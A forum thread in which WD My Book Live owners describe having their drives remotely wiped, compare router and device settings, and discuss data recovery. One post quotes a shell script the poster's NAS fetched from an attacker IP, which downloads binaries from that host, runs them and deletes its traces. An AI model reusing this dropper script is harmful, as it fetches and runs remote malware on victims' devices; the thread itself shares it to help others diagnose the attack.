Help! All data in mybook live gone and owner password unknown

I was not affected. Some data in case it’s helpful in narrowing down what is causing the problem:

Firmware version 02.42.03-027
Auto update disabled.
Remote access disabled and to my knowledge has never been enabled.
Behind NAT with no port forwarding.
UPnP disabled.

Have backups but am making another one just in case.

Update on my end: Trying out Disk Drill, appears to be working. It’s been running for about 5 minutes so far out of an estimated 16 hours and it’s already found a dozen PDFs and JPGs that were deleted. At first glance they look alright, but haven’t done a deep dive on the PDFs yet. Will hold off on purchasing the full version of the program until I can find out what all can be recovered, but it looks promising so far.

For those curious, I disassembled the MBL enclosure, removed the HDD, and plugged it into another external HD case I had. After what happened I didn’t trust trying to run data recovery over the network.

2 Likes

Can you let us know when you have worked out to get into the MyBook Live. It looks as if you have to destroy the plastic case to get into it, I haven’t discovered any screws at all

The case clips together, most of clips broke while prising it apart. No loss as it will not be reassembled, I will not trust it now.

Not tried it yet but found this on YouTube:

From now on, if you lost data, please let us know the following:

  1. On your router, is UPnP enabled or disabled?
  2. Before the device was reset, was Remote Access enabled or disabled?
  3. Did you have Auto Update enabled or disabled?

If any of these are enabled, particularly UPnP, disable them immediately.

Useful, but I’m hoping there is WD fix before I have to destroy the case!

I posted this on reddit, but here it is and hopefully, WD can use this info.

(note edited to only include one link because I’m a new user)

My Netgear Armor started complaining that my WD MyBookLive was trying to reach a couple of URLs and that they were blocked. These were qlitrk dot com (with various sub domains such as supertrk dot qlitrk dot com) and 185.153.196.30/WSC0

I finally looked at what IP address /WSC0 contained and it was this:

#!/bin/sh
n=“OFJU”
if [ $# -gt 0 ]; then
n=$@
fi
cd /tmp
for a in $n
do
rm $a
curl -O http://185.153.196.30/$a
chmod +x $a
./$a
done
for a in $n
do
rm -rf $a
done
rm $0

I’m thankful that Netgear blackholed that 185 address but sheesh… too close for comfort.

If it helps
UPnP enabled
Remote access disabled
Auto update don’t know
Lost data

1 Like

My 3TB MBL’s are both powered down now, with no data loss and account still accessible.

But as I said before in a previous I had a ‘Firmware Successfully Installed’ message in both Dashboards when I logged in.

As I’m a BT customer I’m using a Smart Hub 2 which does have UPNP on for the WD devices on my network.

I do have to ask shouldn’t turning off Remote Access & unchecking check for updates in the Dashboard physically disconnect MBL’s from all internet traffic?

I’ve also disabled Access to the internet on those devices on the Smart Hub, so when / if do turn them on again, they’re not accessible. At least, that’s the theory…

The REST API was accessible to the public, maybe because of UPnP - what a beautiful world, it just works and nobody needs any knowledge.

1 Like
  1. UPnP is enabled on my router
  2. Remote access was enabled prior to this threat, it is off now
  3. Auto Update was disabled
  4. did not lose data
  5. FTP service was disabled
  6. my device’s network name was not a common name
  7. the last firmware updated was received in 2016

nas-firmware

2 Likes

I still have my data with upnp enabled, auto update off, remote access off, ftp off. Last firmware update 2015

1 Like

I got the shaft as well. 2 TB of my children’s pics and videos, DELETED. Memories I’m hoping i can get back through recovery… Their servers had to be compromised.

Not necessarily. Check your router and see if you have UPnP enabled.

Edit: Disable UPnP if it is enabled.

I’ve lost the lot too :(.

Anyone have any idea of what the password gets reset too, or is it a case of having to re reset it to change it?

You may have had a safepoint on the NAS which may be of some benefit. If you have lost data, do not make further changes and do not re-index the drive. It is likely that the data restoration will help recover most or all of your files if no further changes are made to the storage device.

1 Like

Please check your router and see if UPnP is enabled or disabled.

Edit: Disable UPnP if it is enabled.

I feel your pain brother. I had stuff ranging from my kids heartbeat to wedding pics, to everything. I literally broke down when it happened and lost it for a few blaming myself.

1 Like

All data 4 TB gone, business, private, family, schoolwork kids etc. etc… A complete disaster. WD apparently does not care about their responsibility to deliver on their promise to offer reliable hardware for storing the most important data of families around the world. Will proceed tomorrow on recovery of data for what is possible and left. Wondering what WD’s the practical story is and their legal one. For sure, their worldwide market share will be down the drain as well. I hope and pray to recover the majority of the data of our family, but then NEVER WD again. NEVER. Saw some articles passing in this community chat about WD hesitation for releasing security patches through the years. They should be hold liable for this cybersecurity event which is disaster for so many families around the globe.

3 Likes